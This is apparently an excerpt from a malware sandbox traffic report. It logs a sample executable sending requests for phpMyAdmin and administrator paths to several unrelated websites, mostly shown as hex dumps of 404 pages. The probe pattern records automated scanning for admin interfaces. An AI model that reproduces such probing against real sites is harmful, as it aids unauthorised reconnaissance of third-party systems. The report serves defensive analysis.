                                                                                                                                                                                                    Data Ascii: 5836<!doctype html><html class="no-js" lang="en"> <head> <base href="https://ce-logic.com/">...[if lte IE 6]></base><![endif]--> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Pa
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC14658INData Raw: 52 65 73 65 61 72 63 68 20 53 6f 6c 75 74 69 6f 6e 73 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 65 64 75 63 61 74 69 6f 6e 61 6c 2d 73 6f 6c 75 74 69 6f 6e 73 2d 70 61 67 65 2f 6d 61 6b 65 72 73 70 61 63 65 2f 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 77 68 69 74 65 20 61 6c 69 67 6e 2d 63 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 62 74 6e 2d 74 65 78 74 22 3e 4d 61 6b 65 72 73 70 61 63 65 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: Research Solutions</p></a><a href="/educational-solutions-page/makerspace/" class="btn white align-c"><p class="btn-text">Makerspace</p></a></div></div></div>
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    110192.168.2.45730423.185.0.14436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC178OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: www.avient.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC924INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 35 34 33 34 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 38 36 34 30 30 2c 20 70 75 62 6c 69 63 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 45 74 61 67 3a 20 57 2f 22 31 37 30 30 39 37 38 33 37 33 22 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 31 39 20 4e 6f 76 20 31 39 37 38 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 55434Cache-Control: max-age=86400, publicContent-Language: enContent-Type: text/html; charset=UTF-8Etag: W/"1700978373"Expires: Sun, 19 Nov 1978 05:00:00 GMTLast-Modified: Sun, 26 Nov
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1378INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 20 73 63 68 65 6d 61 3a 20 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://schema
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1378INData Raw: 20 30 2c 73 61 3a 76 6f 69 64 20 30 2c 71 75 65 75 65 54 69 6d 65 3a 76 6f 69 64 20 30 2c 61 70 70 6c 69 63 61 74 69 6f 6e 54 69 6d 65 3a 76 6f 69 64 20 30 2c 74 74 47 75 69 64 3a 76 6f 69 64 20 30 2c 75 73 65 72 3a 76 6f 69 64 20 30 2c 61 63 63 6f 75 6e 74 3a 76 6f 69 64 20 30 2c 70 72 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28
                                                                                                                                                                                                    Data Ascii: 0,sa:void 0,queueTime:void 0,applicationTime:void 0,ttGuid:void 0,user:void 0,account:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},o={};function s(e){if(!e)throw new Error(
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1378INData Raw: 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 6d 65 74 72 69 63 73 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 61 63 74 69 6f 6e 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 6c 6f 6e 67 5f 74 61 73 6b 3a 21 31 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 73 65 73 73 69 6f 6e 5f 74 72 61 63 65 3a 7b 65 6e 61 62
                                                                                                                                                                                                    Data Ascii: onds:10,autoStart:!0},metrics:{enabled:!0,autoStart:!0},page_action:{enabled:!0,harvestTimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1,autoStart:!0},session_trace:{enab
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1378INData Raw: 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 3b 66 75 6e 63 74 69 6f 6e 20 68 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 69 66 28 21 67 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 67 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 67 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 66 28 29 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 69 6e 69 74 3d 67 5b 65 5d 29 7d 66 75 6e
                                                                                                                                                                                                    Data Ascii: equire an agent identifier!";function h(e){if(!e)throw new Error(p);if(!g[e])throw new Error("Configuration for ".concat(e," was never set"));return g[e]}function v(e,t){if(!e)throw new Error(p);g[e]=(0,i.D)(t,f());const n=(0,r.ek)(e);n&&(n.init=g[e])}fun
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1378INData Raw: 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 45 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 75 6e 74 69 6d 65 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 45 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 45 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 6b 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e
                                                                                                                                                                                                    Data Ascii: r("All runtime objects require an agent identifier!");if(!E[e])throw new Error("Runtime for ".concat(e," was never set"));return E[e]}function T(e,t){if(!e)throw new Error("All runtime objects require an agent identifier!");E[e]=(0,i.D)(t,k);const n=(0,r.
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1378INData Raw: 31 3a 28 29 3d 3e 75 7d 29 3b 63 6f 6e 73 74 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 21 21 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 4e 61 76 69 67 61 74 6f 72 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 20 69 6e
                                                                                                                                                                                                    Data Ascii: 1:()=>u});const r="undefined"!=typeof window&&!!window.document,i="undefined"!=typeof WorkerGlobalScope&&("undefined"!=typeof self&&self instanceof WorkerGlobalScope&&self.navigator instanceof WorkerNavigator||"undefined"!=typeof globalThis&&globalThis in
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1378INData Raw: 6f 72 20 6f 63 63 75 72 65 64 20 77 68 69 6c 65 20 73 65 74 74 69 6e 67 20 53 68 61 72 65 64 43 6f 6e 74 65 78 74 22 2c 65 29 7d 7d 7d 7d 2c 38 65 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 64 2c 52 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 72 3d 6e 28 38 33 32 35 29 2c 69 3d 6e 28 31 32 38 34 29 2c 61 3d 6e 28 34 33 32 32 29 2c 6f 3d 6e 28 33 33 32 35 29 3b 63 6f 6e 73 74 20 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 7b 73 74 61 67 65 64 3a 21 31 2c 70 72 69 6f 72 69 74 79 3a 6f 2e 70 5b 74 5d 7c 7c 30 7d 3b 75 28 65 29 2c 73 5b 65 5d 2e 67 65 74 28 74 29 7c 7c 73 5b 65 5d 2e 73 65 74 28 74 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b
                                                                                                                                                                                                    Data Ascii: or occured while setting SharedContext",e)}}}},8e3:(e,t,n)=>{"use strict";n.d(t,{L:()=>d,R:()=>c});var r=n(8325),i=n(1284),a=n(4322),o=n(3325);const s={};function c(e,t){const n={staged:!1,priority:o.p[t]||0};u(e),s[e].get(t)||s[e].set(t,n)}function u(e){
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1378INData Raw: 20 6e 3d 72 5b 65 5d 3b 69 66 28 21 6e 29 72 65 74 75 72 6e 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 6e 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 6e 5b 69 5d 3d 3d 3d 74 26 26 6e 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 65 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 69 2c 61 29 7b 21 31 21 3d 3d 61 26 26 28 61 3d 21 30 29 3b 69 66 28 75 2e 61 62 6f 72 74 65 64 26 26 21 69 29 72 65 74 75 72 6e 3b 74 26 26 61 26 26 74 2e 65 6d 69 74 28 65 2c 6e 2c 72 29 3b 66 6f 72 28 76 61 72 20 6f 3d 70 28 72 29 2c 63 3d 76 28 65 29 2c 64 3d 63 2e 6c 65 6e 67 74 68 2c 6c 3d 30 3b 6c 3c 64 3b 6c 2b 2b 29 63 5b 6c 5d 2e 61 70 70 6c 79 28 6f 2c 6e 29 3b 76 61 72 20 66 3d 62 28 29 5b 73 5b 65 5d 5d 3b 66 26 26 66 2e 70 75 73 68 28 5b 67 2c 65 2c 6e 2c 6f 5d 29 3b
                                                                                                                                                                                                    Data Ascii: n=r[e];if(!n)return;for(var i=0;i<n.length;i++)n[i]===t&&n.splice(i,1)},emit:function(e,n,r,i,a){!1!==a&&(a=!0);if(u.aborted&&!i)return;t&&a&&t.emit(e,n,r);for(var o=p(r),c=v(e),d=c.length,l=0;l<d;l++)c[l].apply(o,n);var f=b()[s[e]];f&&f.push([g,e,n,o]);
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1378INData Raw: 3d 7b 67 65 74 20 70 61 73 73 69 76 65 28 29 7b 72 65 74 75 72 6e 20 69 3d 21 30 2c 21 31 7d 2c 67 65 74 20 73 69 67 6e 61 6c 28 29 7b 72 65 74 75 72 6e 20 61 3d 21 30 2c 21 31 7d 7d 3b 72 2e 5f 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 2c 72 2e 5f 41 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 69 7c 7c 61 3f 7b 63 61 70 74 75 72 65 3a 21 21 65 2c 70 61 73 73 69 76 65 3a 69 2c 73 69 67 6e 61 6c 3a 74 7d 3a 21 21 65 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26
                                                                                                                                                                                                    Data Ascii: ={get passive(){return i=!0,!1},get signal(){return a=!0,!1}};r._A.addEventListener("test",null,e),r._A.removeEventListener("test",null,e)}catch(e){}function o(e,t){return i||a?{capture:!!e,passive:i,signal:t}:!!e}function s(e,t){let n=arguments.length>2&


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    111192.168.2.45732015.235.14.1414436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: unaj.edu.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC472INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 58 2d 44 72 75 70 61 6c 2d 44 79 6e 61 6d 69 63 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: must-revalidate, no-cache, privateX-Drupal-Dynamic-Cache: HITX-UA-Compati
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC15912INData Raw: 37 39 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 64 69 72 3d 22 6c 74 72 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 20 73 63 68 65 6d 61 3a 20 68 74 74 70 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: 7970<!DOCTYPE html><html lang="es" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC15189INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 65 73 2f 64 65 66 2d 75 6e 69 2d 73 6f 6d 6f 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 44 65 66 65 6e 73 6f 72 c3 ad 61 20 55 6e 69 76 65 72 73 69 74 61 72 69 61 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 61 6a 2e 65 6e 63 69 63 6c 6f 2e 65 73 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 42
                                                                                                                                                                                                    Data Ascii: </a></li><li class="menu-item"><a href="/es/def-uni-somos"> Defensora Universitaria </a></li><li class="menu-item"><a href="https://unaj.enciclo.es/"> B


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    112192.168.2.457025141.193.213.114436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC182OUTGET /concord/phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: kidsrkids.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC836INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC533INData Raw: 37 63 36 62 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 0a 09 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 6e 63 6f 72 64 20 4c 65 61 72 6e 69 6e 67 20 41 63 61 64 65 6d 79 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 69 64 73 72 6b 69 64 73 2e 63 6f 6d 2f 63 6f 6e 63 6f 72 64 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 3e 0a
                                                                                                                                                                                                    Data Ascii: 7c6b<!DOCTYPE html><html lang="en-US"><head><meta charset="utf-8"><meta name="author" content="Concord Learning Academy"><link rel="pingback" href="https://kidsrkids.com/concord/xmlrpc.php"><meta name="HandheldFriendly" content="True">
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 6e 20 69 73 5f 62 72 6f 77 73 65 72 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69 6e 64 65 78 4f 66 28 22 43 68 72 6f 6d 65 22 29 20 21 3d 3d 20 2d 20 31 20 7c 7c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69 6e 64 65 78 4f 66 28 22 4f 70 65 72 61 22 29 20 21 3d 3d 20 2d 20 31 20 7c 7c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69 6e 64 65 78 4f 66 28 22 46 69 72 65 66 6f 78 22 29 20 21 3d 3d 20 2d 20 31 20 7c 7c 0a 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: n is_browser() { return ( navigator.userAgent.indexOf("Chrome") !== - 1 || navigator.userAgent.indexOf("Opera") !== - 1 || navigator.userAgent.indexOf("Firefox") !== - 1 ||
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 09 74 72 69 67 67 65 72 3a 20 66 75 6e 63 74 69 6f 6e 20 28 20 65 76 65 6e 74 5f 74 79 70 65 2c 20 65 76 65 6e 74 5f 64 61 74 61 2c 20 65 6c 20 29 20 7b 0a 09 09 09 09 09 09 76 61 72 20 65 76 65 6e 74 3b 0a 09 09 09 09 09 09 74 72 79 20 7b 0a 09 09 09 09 09 09 09 65 76 65 6e 74 20 3d 20 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 20 65 76 65 6e 74 5f 74 79 70 65 2c 20 7b 20 64 65 74 61 69 6c 3a 20 65 76 65 6e 74 5f 64 61 74 61 20 7d 20 29 3b 0a 09 09 09 09 09 09 7d 20 63 61 74 63 68 20 28 20 65 20 29 20 7b 0a 09 09 09 09 09 09 09 65 76 65 6e 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 20 27 43 75 73 74 6f 6d 45 76 65 6e 74 27 20 29 3b 0a 09 09 09 09 09 09 09 65 76 65 6e 74 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74
